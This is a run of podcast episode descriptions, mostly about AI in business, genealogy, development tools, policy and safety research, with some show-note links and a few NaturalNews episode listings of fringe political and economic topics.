Bryan Murphy, CEO of Smartling, confronts a $40 billion industry stuck in the slow lane, the world of translation. Most companies still handle translations like it's 1999: manual, expensive, and painfully slow. Bryan saw AI as the game changer that could rewrite the rules, but integrating it wasn't a walk in the park. He shares how Smartling harnessed AI to not just cut costs and speed up translation but to finally boost quality close to human-level precision without losing control over brand voice or nuance. Yet, making this leap meant upheaval: reorganizing teams, hiring AI experts, and establishing ruthless R&D discipline to separate winning ideas from distractions. Thanks for tuning in! New episodes of Topline drop every Sunday and Thursday. Don't miss GTM2025 — the only B2B tech conference exclusively for GTM executives. Elevate your 2026 strategy and join us from September 23 to 25 in Washington, D.C. Use code TOPLINE for 10% off your GA ticket. Stay ahead with the latest industry developments and emerging go-to-market trends with Topline Newsletter by Asad Zaman. Subscribe today. Tune in to The Revenue Leadership Podcast every Wednesday, where host Kyle Norton talks with real revenue operators and dives deep into what it takes to succeed as a modern revenue leader. You're invited! Join the free Topline Slack channel to connect with 600+ revenue leaders, share insights, and keep the conversation going beyond the podcast! Key chapters: (00:00) - Introduction to Bryan Murphy and Defining the Translation Challenge (02:30) - The Hidden $40B Translation Market and Its Untapped Potential (04:00) - The Evolution of Translation Services: From Manual to AI-Driven Automation (06:00) - Early AI in Translation: Faster and Cheaper, But Not Yet Better (08:00) - Defining Quality: The MQM Standard and Bridging AI-Human Gaps (09:20) - Human-in-the-Loop AI: Boosting Translator Productivity Tenfold (10:30) - Full AI Translation Approaching Human Grade: The Game Changer (11:45) - The Future Mix: Human Expertise vs. Automated Scale in AI Translation (13:00) - Unlocking Market Expansion Through Improved SEO and Digital Footprint (15:00) - The Moment of Truth: Recognizing GPT's Impact and Rolling Out Rapid Innovation (16:30) - Founder's Speed: Breaking Plans and Aligning Teams for Urgent AI Adoption (18:00) - Overcoming Organizational Challenges: From Excitement to Structured Execution (20:00) - R&D Reimagined: Timeboxing Experiments With Clear Metrics to Avoid Spinning Wheels (22:00) - The Discipline of “Customer-First” in AI Development and Roadmapping (24:00) - Leadership Lessons: Listening Without Losing Vision Amidst Painful Change (26:00) - Winning Customer Trust: Betting On Proofs of Concept Against Skeptics (28:00) - Personal Insights: Favorite Leadership Books and the Role of Intellectual Curiosity (29:30) - Staying Sharp: Daily Reading and Customer Conversations as Strategic Tools (31:00) - Managing Stress and Longevity: The Art of Mental Compartmentalization for Founders (32:30) - Final Thoughts: The Unseen Power of Humility in Leadership and Continual Learning (33:00) - Wrap-up and Invitation to Follow Smartling's AI-Empowered Evolution
Co-hosts Mark Thompson and Steve Little explore the groundbreaking release of ChatGPT-5, which arrived after over a year of anticipation. They discuss how this new model transforms the AI landscape with better reasoning, larger context windows, and dramatically reduced hallucinations.The hosts examine OpenAI's new Study and Learn Mode, which acts as a personal tutor rather than just providing answers, making it ideal for genealogists who want to deepen their understanding of their favourite topic.This week's Tip of the Week cautions beginners about challenging AI tasks like handwritten transcriptions and structured files, recommending they master the basics first.In RapidFire, they cover OpenAI's first open-source release since 2019, NotebookLM's video capabilities, and impressive AI company earnings reports.Timestamps:In the News:00:55 ChatGPT-5 Has Arrived: Improved Features (mostly) for Genealogists16:29 OpenAI's Study and Learn Mode: Your Personal Genealogy Tutor23:40 Claude Releases Opus 4.1: Enhanced Reasoning and WritingTip of the Week:29:25 AI Tasks for Beginners to Be Cautious OfRapidFire:40:16 OpenAI Releases First Open Source Model Since 201948:33 NotebookLM Upgrade Adds Video Support53:34 AI Companies Report Record EarningsResource LinksIntroduction to Family History AIhttps://tixoom.app/fhaishow/OpenAI GPT-5 Model Cardhttps://openai.com/index/gpt-5-system-card/Introducing study modehttps://openai.com/index/chatgpt-study-mode/ChatGPT Study Mode - FAQhttps://help.openai.com/en/articles/11780217-chatgpt-study-mode-faqClaude Opus 4.1https://www.anthropic.com/news/claude-opus-4-1OpenAI announces two "gpt-oss" open AI modelshttps://arstechnica.com/ai/2025/08/openai-releases-its-first-open-source-models-since-2019/Google's NotebookLM rolls out Video Overviewshttps://techcrunch.com/2025/07/29/googles-notebooklm-rolls-out-video-overviews/Tech bubble going pop: AI pays the price for inflated expectationshttps://www.theguardian.com/commentisfree/article/2024/aug/07/the-guardian-view-on-a-tech-bubble-going-pop-ai-pays-the-price-for-inflated-expectationsIs The AI Bubble About To Burst?https://www.forbes.com/sites/bernardmarr/2024/08/07/is-the-ai-bubble-about-to-burst/Google loses appeal in antitrust battle with Fortnite makerhttps://masslawyersweekly.com/2025/08/06/google-play-monopoly-verdict-epic-games-win/Department of Justice Prevails in Landmark Antitrust Case Against Googlehttps://www.justice.gov/opa/pr/department-justice-prevails-landmark-antitrust-case-against-googleTagsArtificial Intelligence, Technology, Genealogy, Family History, OpenAI, ChatGPT-5, Claude, Large Language Models, AI Learning Tools, Study Mode, Open Source AI, NotebookLM, Video Overviews, AI Reasoning, Context Windows, Hallucination Reduction, GEDCOM Files, Handwritten Transcription, Document Analysis, AI Earnings, Google Antitrust, Apache License, Local AI Processing, Privacy, AI Education, Tutoring Systems, Coding Capabilities, Multilingual Processing, AI Development, Family History Research, Genealogists, AI Tools, Machine Learning
- Discovery of Secret Room in FBI Building (0:11) - Criticism of FBI and Intelligence Agencies (1:24) - Challenges with Burn Bags and Document Destruction (2:48) - Lack of Arrests and Legal Challenges (5:26) - Summary of Document Findings (9:25) - Trump Administration's Legal Strategy (11:54) - Hopes for Mass Arrests (15:08) - Challenges with Power Grid and AI Data Centers (25:17) - Impact of Tariffs on Transformer Supply (46:48) - Future of Energy and Decentralized Solutions (1:09:21) - Introduction of Enoch AI Engine (1:15:24) - Challenges with AI Data and Personal Experiences (1:25:51) - Development and Performance of the AI Engine (1:28:19) - Decentralization and Open-Source AI (1:30:34) - Training Data and AI Capabilities (1:33:59) - Prompt Engineering and AI Applications (1:40:28) - Challenges and Future of AI Development (1:55:27) - Censorship and Regulatory Concerns (1:57:29) - Global AI Competition and Technological Advancements (2:06:23) - Economic and Political Implications of AI (2:18:04) - Geopolitical Shifts and Centralized Power (2:25:24) - Demoralization and Betrayal of American Dream (2:39:28) - Apocalypse Accelerationism and Christian Zionism (2:42:43) - Critique of Religious Institutions and Their Teachings (2:46:44) - Historical Context and Modern Implications (2:49:42) - Cults and Their Influence on Global Events (2:52:32) - The Role of Media and Education in Shaping Perceptions (2:55:27) - The Impact of Religious Supremacy on Global Conflict (3:12:55) - The Role of Individual Actions in Promoting Peace (3:19:24) - The Future of Global Peace and Understanding (3:21:06) For more updates, visit: http://www.brighteon.com/channel/hrreport NaturalNews videos would not be possible without you, as always we remain passionately dedicated to our mission of educating people all over the world on the subject of natural healing remedies and personal liberty (food freedom, medical freedom, the freedom of speech, etc.). Together, we're helping create a better world, with more honest food labeling, reduced chemical contamination, the avoidance of toxic heavy metals and vastly increased scientific transparency. ▶️ Every dollar you spend at the Health Ranger Store goes toward helping us achieve important science and content goals for humanity: https://www.healthrangerstore.com/ ▶️ Sign Up For Our Newsletter: https://www.naturalnews.com/Readerregistration.html ▶️ Brighteon: https://www.brighteon.com/channels/hrreport ▶️ Join Our Social Network: https://brighteon.social/@HealthRanger ▶️ Check In Stock Products at: https://PrepWithMike.com
In this episode of Tech Talks Daily, I sat down with Boris Bialek, VP and Field CTO at MongoDB, for a conversation that moved well beyond databases. As AI continues to accelerate across sectors, MongoDB is positioning itself at the intersection of modern data architecture and intelligent application development. Boris shared how his team is simplifying AI adoption for enterprises, with a clear focus on real-world outcomes, developer productivity, and global inclusion. We began by exploring MongoDB's recent acquisition of Voyage AI. This move extends MongoDB's native capabilities into vector search, embeddings, and re-rankers, allowing developers to build AI-powered applications more efficiently. Boris explained how MongoDB is removing the complexity from AI integration by providing a unified API, collapsing what used to be 18 disconnected tools into a streamlined developer experience. But the discussion wasn't just about technology. Boris brought a passionate focus to the issue of financial inclusion. We talked about how AI can enable alternative credit scoring for the 27 percent of adults globally who remain unbanked. By analyzing behavioral signals such as mobile payment histories or utility data, AI can help unlock microcredit opportunities for individuals and small businesses in underserved regions. Boris shared use cases from PicPay in Brazil, M-Pesa in Africa, and Proxtera in Singapore, each demonstrating how AI and MongoDB are enabling new forms of digital trust. We also tackled the organizational and technical hurdles to enterprise AI adoption. From fears about hallucinations to managing constant model updates, Boris described how MongoDB is building systems that prioritize transparency, auditability, and scale. With its document model and integrated tooling, MongoDB offers a stable foundation for companies navigating fast-moving AI transformations. For developers, the platform now includes learnmongodb.com and quick-skill badges designed to make AI approachable and hands-on. And with the upcoming release of Boris's new book, there's more to come on how businesses can move from pilot experiments to production-grade solutions. How is your organization rethinking its data strategy to make AI work at scale?
Kent C. Dodds is back with bold ideas and a game-changing vision for the future of AI and web development. In this episode, we dive into the Model Context Protocol (MCP), the power behind Epic AI Pro, and how developers can start building Jarvis-like assistants today. From replacing websites with MCP servers to reimagining voice interfaces and AI security, Kent lays out the roadmap for what's next, and why it matters right now. Don't miss this fast-paced conversation about the tools and tech reshaping everything. Links Website: https://kentcdodds.com X: https://x.com/kentcdodds Github: https://github.com/kentcdodds YouTube: https://www.youtube.com/c/kentcdodds-vids Twitch: https://www.twitch.tv/kentcdodds LinkedIn: https://www.linkedin.com/in/kentcdodds Resources Please make Jarvis (so I don't have to): https://www.epicai.pro/please-make-jarvis AI Engineering Posts by Kent C. Dodds: https://www.epicai.pro/posts We want to hear from you! How did you find us? Did you see us on Twitter? In a newsletter? Or maybe we were recommended by a friend? Let us know by sending an email to our producer, Em, at emily.kochanek@logrocket.com (mailto:emily.kochanek@logrocket.com), or tweet at us at PodRocketPod (https://twitter.com/PodRocketpod). Follow us. Get free stickers. Follow us on Apple Podcasts, fill out this form (https://podrocket.logrocket.com/get-podrocket-stickers), and we'll send you free PodRocket stickers! What does LogRocket do? LogRocket provides AI-first session replay and analytics that surfaces the UX and technical issues impacting user experiences. Start understanding where your users are struggling by trying it for free at LogRocket.com. Try LogRocket for free today. (https://logrocket.com/signup/?pdr) Special Guest: Kent C. Dodds.
Canada's AI Future: Navigating Challenges and Opportunities In this episode of Hashtag Trending on the Weekend, host Jim Love interviews Steven Karan, Vice President of AI and Data at Capgemini Canada. They discuss Canada's role in the global AI landscape, the current state of AI investment, and the importance of developing local talent and infrastructure to compete internationally. Steven highlights the need for Canada to adopt a cohesive national AI strategy, prioritize investments, and leverage its collaborative nature to lead in open-source AI development. fThe conversation also touches on the impact of AI on the younger generation and the crucial steps required to prepare them for future job markets. 00:00 Introduction and Guest Welcome 00:34 Overview of Capgemini and Steven's Role 01:28 The Pivotal Point of AI in Canada 02:19 Canada's Position in the Global AI Landscape 04:09 Challenges and Opportunities for AI Talent in Canada 08:50 The Importance of Scaling AI 13:46 Investment and Infrastructure Needs 17:19 The Role of Government in AI Development 20:48 A Vision for Canada's AI Future 23:08 Revolutionizing Healthcare with AI 24:25 The Trust Dilemma in Autonomous Agents 25:18 Championing Open Source AI 26:34 Addressing AI Skepticism 28:46 Human-AI Collaboration 36:45 Preparing the Next Generation for AI 44:26 Conclusion and Final Thoughts
- Organ Harvesting Nightmare (0:11) - Trump vs. BRICS: The Global Currency War (26:06) - The AI Race and US Energy Production (36:54) - The Economic and Social Implications of AI (1:15:35) - The Role of Free Energy Technology (1:15:57) - The Future of AI and Energy (1:18:37) - The Economic and Political Landscape (1:18:53) - The Role of Government and Industry (1:19:13) - The Impact of Energy Policy on AI Development (1:19:30) - The Future of Energy and AI (1:19:50) - Texas Power Grid and AI Data Centers (1:20:05) - Impact of AI Data Centers on Residential Units (1:25:59) - Challenges of Diesel Generators and Copper Costs (1:26:27) - Historical Decisions and Infrastructure Sabotage (1:30:00) - Global Power and AI Dominance (1:32:29) - Economic and Political Implications (1:33:24) - Preparation for Economic Collapse (1:35:57) - Interview with Bill Holter (1:48:51) - Silver Market and Failure to Deliver (2:10:12) - Societal Impact of Economic Collapse (2:22:13) - Preparedness for Survival Scenarios (2:27:36) - Practical Preparedness Tips (2:41:53) - Final Thoughts and Advice (2:42:55) - Product Promotion and Health Advice (2:43:57) For more updates, visit: http://www.brighteon.com/channel/hrreport NaturalNews videos would not be possible without you, as always we remain passionately dedicated to our mission of educating people all over the world on the subject of natural healing remedies and personal liberty (food freedom, medical freedom, the freedom of speech, etc.). Together, we're helping create a better world, with more honest food labeling, reduced chemical contamination, the avoidance of toxic heavy metals and vastly increased scientific transparency. ▶️ Every dollar you spend at the Health Ranger Store goes toward helping us achieve important science and content goals for humanity: https://www.healthrangerstore.com/ ▶️ Sign Up For Our Newsletter: https://www.naturalnews.com/Readerregistration.html ▶️ Brighteon: https://www.brighteon.com/channels/hrreport ▶️ Join Our Social Network: https://brighteon.social/@HealthRanger ▶️ Check In Stock Products at: https://PrepWithMike.com
Time now for our daily Tech and Business Report. Today, the White House has release what it's calling an AI Action Plan with the hope of boosting the development of artificial intelligence in the United States. For more, KCBS Radio anchor Holly Quan spoke with Bloomberg Politics Reporter Stephanie Lai.
For episode 549 of the BlockHash Podcast, host Brandon Zemp is joined by Rowan Stone, CEO of Sapien.Data is the biggest opportunity in AI. That's why Sapien has built a global community where anyone can contribute to AI development through engaging tasks. On Sapien, AI Workers are automatically matched with optimal tasks based on their skills and preferences. Learn more at https://earn.sapien.io ⏳ Timestamps: 0:00 | Introduction1:00 | Who is Rowan Stone?5:03 | What is Sapien?9:02 | How to contribute data with Sapien11:40 | Limitations on contribution16:00 | What do Tasks look like?20:38 | How to eliminate AI biases23:33 | Sapien use-cases26:03 | Future of decentralized model training29:12 | Sapien roadmap31:33 | Sapien website, socials & community
AI Applied: Covering AI News, Interviews and Tools - ChatGPT, Midjourney, Runway, Poe, Anthropic
In this episode, Conor and Jaeden discuss Meta's rapid evolution from social media to AI, highlighting Zuckerberg's aggressive hiring strategy and the construction of colossal data centers. They explore the implications of these developments, including the environmental impact of AI and the competitive landscape in the tech industry.AI Applied YouTube Channel: https://www.youtube.com/@AI-Applied-PodcastTry AI Box: https://AIBox.ai/Conor's AI Course: https://www.ai-mindset.ai/coursesConor's AI Newsletter: https://www.ai-mindset.ai/Jaeden's AI Hustle Community: https://www.skool.com/aihustle/aboutYouTube Video: https://youtu.be/nJ2pMQxTSicChapters00:00 Meta's Rapid Evolution in AI02:05 Zuckerberg's Talent Acquisition Strategy08:42 The Scale of Meta's Data Centers12:27 Environmental Considerations in AI Development
Co-hosts Mark Thompson and Steve Little examine the controversial rise of AI image "restoration" and discuss how entirely new images are being generated, rather than the original photos being restored. This is raising concerns about the preservation of authentic family photos.They discuss Mark's reconsideration of canceling his Perplexity subscription after rediscovering its unique strengths for supporting research.The hosts analyze recent court rulings that permit AI training on legally acquired content, plus Disney's ongoing case against Midjourney.This week's Tip of the Week explores how project workspaces in ChatGPT and Claude can greatly simplify your genealogical research.In RapidFire, the hosts cover Meta's aggressive AI hiring spree, the proliferation of AI tools in everyday software, including a new genealogy transcription tool from Dan Maloney, and the importance of reading AI news critically.Timestamps:In the News:06:50 The Pros and Cons of "Restoring" Family Photos with AI23:58 Mark is Cancelling Perplexity... Maybe32:33 AI Copyright Cases Are Starting to Work Their Way Through the CourtsTip of the Week:40:09 How Project Workspaces Help Genealogists Stay OrganizedRapidFire:48:51 Meta Goes on a Hiring Spree56:09 AI Is Everywhere!01:06:00 Reading AI News ResponsiblyResource LinksOpenAI: Introducing 4o Image Generation https://openai.com/index/introducing-4o-image-generation/Perplexity https://www.perplexity.ai/How does Perplexity work? https://www.perplexity.ai/help-center/en/articles/10352895-how-does-perplexity-workAnthropic wins key US ruling on AI training in authors' copyright lawsuit https://www.reuters.com/legal/litigation/anthropic-wins-key-ruling-ai-authors-copyright-lawsuit-2025-06-24/Meta wins AI copyright lawsuit as US judge rules against authors https://www.theguardian.com/technology/2025/jun/26/meta-wins-ai-copyright-lawsuit-as-us-judge-rules-against-authorsDisney, Universal sue image creator Midjourney for copyright infringement https://www.reuters.com/business/media-telecom/disney-universal-sue-image-creator-midjourney-copyright-infringement-2025-06-11/Disney and Universal Sue A.I. Firm for Copyright Infringement https://www.nytimes.com/2025/06/11/business/media/disney-universal-midjourney-ai.htmlProjects in ChatGPThttps://help.openai.com/en/articles/10169521-projects-in-chatgptMeta shares hit all-time high as Mark Zuckerberg goes on AI hiring blitz https://www.cnbc.com/2025/06/30/meta-hits-all-time-mark-zuckerberg-ai-blitz.htmlHere's What Mark Zuckerberg Is Offering Top AI Talent https://www.wired.com/story/mark-zuckerberg-meta-offer-top-ai-talent-300-million/Genealogy Assistant AI Handwritten Text Recognition Tool https://www.genea.ca/htr-tool/Borland Genetics https://borlandgenetics.com/Illusion of Thinking https://machinelearning.apple.com/research/illusion-of-thinkingSimon Willison: Seven replies to the viral Apple reasoning paper -- and why they fall short https://simonwillison.net/2025/Jun/15/viral-apple-reasoning-paper/MIT: Your Brain on ChatGPT https://www.media.mit.edu/projects/your-brain-on-chatgpt/overview/MIT researchers say using ChatGPT can rot your brain. The truth is a little more complicated https://theconversation.com/mit-researchers-say-using-chatgpt-can-rot-your-brain-the-truth-is-a-little-more-complicated-259450Guiding Principles for Responsible AI in Genealogy https://craigen.org/TagsArtificial Intelligence, Genealogy, Family History, AI Tools, Image Generation, AI Ethics, Perplexity, ChatGPT, Claude, Meta, Copyright Law, AI Training, Photo Restoration, Project Management, AI Development, Research Tools, Responsible AI Use, GRIP, AI News Analysis, Vibe Coding, Coalition for Responsible AI in Genealogy, AI Hiring, Dan Maloney, Handwritten Text Recognition
Ethan Mollick, Professor of Management and author of the “One Useful Thing” Substack, joins Kevin Frazier, the AI Innovation and Law Fellow at the University of Texas School of Law and a Senior Editor at Lawfare, and Alan Rozenshtein, Associate Professor at Minnesota Law and a Senior Editor at Lawfare, to analyze the latest research in AI adoption, specifically its use by professionals and educators. The trio also analyze the trajectory of AI development and related, ongoing policy discussions.More of Ethan Mollick's work: https://www.oneusefulthing.org/Find Scaling Laws on the Lawfare website, and subscribe to never miss an episode.To receive ad-free podcasts, become a Lawfare Material Supporter at www.patreon.com/lawfare. You can also support Lawfare by making a one-time donation at https://givebutter.com/lawfare-institute.Support this show http://supporter.acast.com/lawfare. Hosted on Acast. See acast.com/privacy for more information.
How can AI tech help you write better code? Carl and Richard talk to Mark Miller about the latest AI features coming in CodeRush. Mark talks about focusing on a fast and cost-effective AI assistant driven by voice, so you don't have to switch to a different window and type. The conversation delves into the rapid evolution of software development, utilizing AI technologies to accomplish more in less time.
In this episode of Scaling Laws, Alan and Kevin discuss the current state of AI growth, focusing on scaling laws, the future of AGI, and the challenges of AI integration into society with Ethan Mollick, Professor of Management at Wharton, specializing in entrepreneurship and innovation. They explore the bottlenecks in AI adoption, particularly the role of interfaces and the uncertainty surrounding AI development. Mollick discusses the transformative potential of AI in various fields, particularly education and medicine, as well as the need for empirical research to understand AI's impact, the importance of adapting teaching methods, and the challenges of cognitive de-skilling.More of Ethan Mollick's work: https://www.oneusefulthing.org/ Hosted on Acast. See acast.com/privacy for more information.
n this episode, we explore the rise of AI in Hollywood through the lens of actors and artists. We discuss the promise of AI tools—like virtual readers for self-tapes—and how they could free creatives to focus on their craft, but also warn of the risks when AI replaces human storytelling. Our guest stresses the need for diverse ethical oversight in AI development, drawing parallels to how Facebook's unintended global impact stemmed from a lack of diverse perspectives at creation. Learn why we need more “naysayers” guiding AI's creative applications, where to draw the line between useful automation and creative displacement, and how tech-savvy actors can advocate for their future. Tune in for a timely conversation on balancing innovation and ethics in Hollywood's AI era.Target KeywordsAI in HollywoodHollywood AI ethicsActors and AI toolsAI creative jobs riskAI entertainment futureTags: AI, Hollywood, AI Ethics, Actors, AI in Entertainment, Creative AI Tools, Self-Tapes, Ethical AI, Tech in Film, AI Risks, Storytelling, Virtual Readers, AI Oversight, Diversity in AI, Creative Automation, AI Jobs, Film Industry Trends, Casting Tech, AI Development, Actor Advocacy, Innovation, Digital Ethics, Future of Acting, Machine Learning, Entertainment Technology, Tech Experts, Artist Perspectives, AI Regulation, Career Impact, PodcastEpisodeHashtags: #AIinHollywood #HollywoodEthics #ActorsAndAI #CreativeAI #EntertainmentTech #AIrisks #AItools #FilmInnovation #Storytelling #EthicalAI #DiversityInTech #SelfTapes #CastingTech #AIoversight
For episode 534 of the BlockHash Podcast, host Brandon Zemp is joined by Jawad Ashraf, CEO of Vanar Chain to discuss how they are the intelligent chain for real world finance.Vanar Chain is working on their innovative Neutron AI Compression technology. Neutron introduces advanced AI-driven compression, enabling a 50MB file to fit into a mere 25-50 character seed stored directly on-chain. This innovation eliminates reliance on external storage systems, dramatically reducing costs and improving blockchain scalability and efficiency. ⏳ Timestamps: 0:00 | Introduction1:04 | Who is Jawad Ashraf?8:10 | What is Vanar Chain?16:34 | Vanar Chain ecosystem20:56 | Developer resources22:20 | Innovation in on-chain data storage25:50 | Consumer usability in Web330:57 | Future of Semantic Internet36:40 | Vanar Chain roadmap for 202538:08 | Conferences and Events38:50 | Web3 in Dubai40:48 | Vanar website, socials & community
In this episode of Cybersecurity Today, host Jim Love is joined by Krish Banerjee, the Canada Managing Director at Accenture for AI and Data. They begin the discussion with a report from Accenture that highlights the gap between the perceived and actual preparedness for cybersecurity as AI becomes more integrated into business operations. Jim and Krish discuss the pressing need for businesses to implement AI responsibly while addressing cybersecurity concerns. They also touch upon the current state of AI in Canada, efforts towards digital sovereignty, and the importance of integrating AI thoughtfully into various sectors. Through their insightful conversation, they explore the challenges and opportunities that lie ahead in making AI a cornerstone of productivity and innovation in the enterprise, emphasizing the need for value-driven strategies, the right tools, and skilled talent. 00:00 Introduction and Overview 02:10 AI in the Enterprise: Challenges and Opportunities 03:17 The Evolution of Data and AI 06:42 Enterprise AI: Current State and Future Prospects 15:20 Digital Sovereignty and National AI Strategies 25:07 Accelerating Technological Advancements 26:18 Dream Projects and AI for Good 27:58 Reinventing Healthcare with AI 28:42 Commercializing AI for Canadian Businesses 30:30 The Responsibility of AI Development 31:02 Economic Shifts and AI's Role 31:57 Future Predictions for AI 35:31 Agentic AI: The Next Frontier 41:14 Open Source AI and Its Implications 43:32 Advice for Executives on AI Adoption 47:13 Encouraging AI Learning in the Next Generation 49:10 Final Thoughts and Reflections
Recently, the risks about Artificial Intelligence and the need for ‘alignment' have been flooding our cultural discourse – with Artificial Super Intelligence acting as both the most promising goal and most pressing threat. But amid the moral debate, there's been surprisingly little attention paid to a basic question: do we even have the technical capability to guide where any of this is headed? And if not, should we slow the pace of innovation until we better understand how these complex systems actually work? In this episode, Nate is joined by Artificial Intelligence developer and researcher, Connor Leahy, to discuss the rapid advancements in AI, the potential risks associated with its development, and the challenges of controlling these technologies as they evolve. Connor also explains the phenomenon of what he calls ‘algorithmic cancer' – AI generated content that crowds out true human creations, propelled by algorithms that can't tell the difference. Together, they unpack the implications of AI acceleration, from widespread job disruption and energy-intensive computing to the concentration of wealth and power to tech companies. What kinds of policy and regulatory approaches could help slow down AI's acceleration in order to create safer development pathways? Is there a world where AI becomes a tool to aid human work and creativity, rather than replacing it? And how do these AI risks connect to the deeper cultural conversation about technology's impacts on mental health, meaning, and societal well-being? (Conversation recorded on May 21st, 2025) About Connor Leahy: Connor Leahy is the founder and CEO of Conjecture, which works on aligning artificial intelligence systems by building infrastructure that allows for the creation of scalable, auditable, and controllable AI. Previously, he co-founded EleutherAI, which was one of the earliest and most successful open-source Large Language Model communities, as well as a home for early discussions on the risks of those same advanced AI systems. Prior to that, Connor worked as an AI researcher and engineer for Aleph Alpha GmbH. Show Notes and More Watch this video episode on YouTube Want to learn the broad overview of The Great Simplification in 30 minutes? Watch our Animated Movie. --- Support The Institute for the Study of Energy and Our Future Join our Substack newsletter Join our Discord channel and connect with other listeners
In this thought-provoking episode of Project Synapse, host Jim and his friends Marcel Gagne and John Pinard delve into the complexities of artificial intelligence, especially in the context of cybersecurity. The discussion kicks off by revisiting a blog post by Sam Altman about reaching a 'Gentle Singularity' in AI development, where the progress towards artificial superintelligence seems inevitable. They explore the idea of AI surpassing human intelligence and the implications of machines learning to write their own code. Throughout their engaging conversation, they emphasize the need to integrate security into AI systems from the start, rather than as an afterthought, citing recent vulnerabilities like Echo Leak and Microsoft Copilot's Zero Click vulnerability. Derailing into stories from the past and pondering philosophical questions, they wrap up by urging for a balanced approach where speed and thoughtful planning coexist, and to prioritize human welfare in technological advancements. This episode serves as a captivating blend of storytelling, technical insights, and ethical debates. 00:00 Introduction to Project Synapse 00:38 AI Vulnerabilities and Cybersecurity Concerns 02:22 The Gentle Singularity and AI Evolution 04:54 Human and AI Intelligence: A Comparison 07:05 AI Hallucinations and Emotional Intelligence 12:10 The Future of AI and Its Limitations 27:53 Security Flaws in AI Systems 30:20 The Need for Robust AI Security 32:22 The Ubiquity of AI in Modern Society 32:49 Understanding Neural Networks and Model Security 34:11 Challenges in AI Security and Human Behavior 36:45 The Evolution of Steganography and Prompt Injection 39:28 AI in Automation and Manufacturing 40:49 Crime as a Business and Security Implications 42:49 Balancing Speed and Security in AI Development 53:08 Corporate Responsibility and Ethical Considerations 57:31 The Future of AI and Human Values
Jesse Hoogland and Daniel Murfet, founders of Timaeus, introduce their mathematically rigorous approach to AI safety through "developmental interpretability" based on Singular Learning Theory. They explain how neural network loss landscapes are actually complex, jagged surfaces full of "singularities" where models can change internally without affecting external behavior—potentially masking dangerous misalignment. Using their Local Learning Coefficient measure, they've demonstrated the ability to identify critical phase changes during training in models up to 7 billion parameters, offering a complementary approach to mechanistic interpretability. This work aims to move beyond trial-and-error neural network training toward a more principled engineering discipline that could catch safety issues during training rather than after deployment. Sponsors: Oracle Cloud Infrastructure: Oracle Cloud Infrastructure (OCI) is the next-generation cloud that delivers better performance, faster speeds, and significantly lower costs, including up to 50% less for compute, 70% for storage, and 80% for networking. Run any workload, from infrastructure to AI, in a high-availability environment and try OCI for free with zero commitment at https://oracle.com/cognitive The AGNTCY (Cisco): The AGNTCY is an open-source collective dedicated to building the Internet of Agents, enabling AI agents to communicate and collaborate seamlessly across frameworks. Join a community of engineers focused on high-quality multi-agent software and support the initiative at https://agntcy.org/?utmcampaign=fy25q4agntcyamerpaid-mediaagntcy-cognitiverevolutionpodcast&utmchannel=podcast&utmsource=podcast NetSuite by Oracle: NetSuite by Oracle is the AI-powered business management suite trusted by over 41,000 businesses, offering a unified platform for accounting, financial management, inventory, and HR. Gain total visibility and control to make quick decisions and automate everyday tasks—download the free ebook, Navigating Global Trade: Three Insights for Leaders, at https://netsuite.com/cognitive PRODUCED BY: https://aipodcast.ing CHAPTERS: (00:00) About the Episode (04:44) Introduction and Background (06:17) Timaeus Origins and Philosophy (09:13) Mathematical Background and SLT (12:27) Developmental Interpretability Approach (Part 1) (16:09) Sponsors: Oracle Cloud Infrastructure | The AGNTCY (Cisco) (18:09) Developmental Interpretability Approach (Part 2) (19:24) Proto-Paradigm and SAEs (24:37) Understanding Generalization (30:15) Central Dogma Framework (Part 1) (32:13) Sponsor: NetSuite by Oracle (33:37) Central Dogma Framework (Part 2) (34:35) Loss Landscape Geometry (40:41) Degeneracies and Evidence (47:25) Structure and Data Connection (55:36) Essential Dynamics and Algorithms (01:00:53) Implicit Regularization and Complexity (01:07:19) Double Descent and Scaling (01:09:55) Big Picture Applications (01:17:17) Reward Hacking and Risks (01:25:19) Future Training Vision (01:32:01) Scaling and Next Steps (01:36:43) Outro
Explore FSx for Lustre's new intelligent storage tiering that delivers cost savings and unlimited scalability for file storage in the cloud. Plus, discover how the new Model Context Protocol (MCP) servers are revolutionizing AI-assisted development across ECS, EKS, and serverless platforms with real-time contextual responses and automated resource management. 00:00 - Intro, 00:52 - Introduction new storage class, 03:43 - MCP Servers, 07:18 - Analytics, 09:34 - Application Integration, 15:52 - Business Applications, 16:21 - Cloud Financial Management, 17:44 - Compute, 20:44 - Containers, 21:31 - Databases, 24:25 - Developer Tools, 25:42 - End User Computing, 25:58 - Gaming, 26:34 - Management and Governance, 28:35 - Marketplace, 28:51 - Media Services, 29:29 - Migration and Transfer, 30:01 - Networking and Content Delivery, 34:01 - Security Identity and Compliance, 34:43 - Serverless, 35:06 - Storage, 36:55 - Wrap up Show Notes: https://dqkop6u6q45rj.cloudfront.net/shownotes-20250613-185437.html
Chinese exports of rare earths, a critical component in manufacturing high-end tech products, emerged as a key sticking point in this week's trade talks between Beijing and Washington. Underpinning all of this is the race for artificial intelligence supremacy. Who is winning this competition? Who is best placed to control the supply chains of all the components that go into the top chips and AI models? Jared Cohen and George Lee, the co-heads of the Goldman Sachs Global Institute, join FP Live. Note: This discussion is part of a series of episodes brought to you by the Goldman Sachs Global Institute. Jared Cohen: The AI Economy's Massive Vulnerability Rishi Iyengar & Lili Pike: Is It Too Late to Slow China's AI Development? Vivek Chilukuri: How the United States Can Win the Global Tech Race Brought to you by: nordvpn.com/fplive (Exclusive NordVPN Deal: Try it risk-free now with a 30-day money-back guarantee) Learn more about your ad choices. Visit megaphone.fm/adchoices
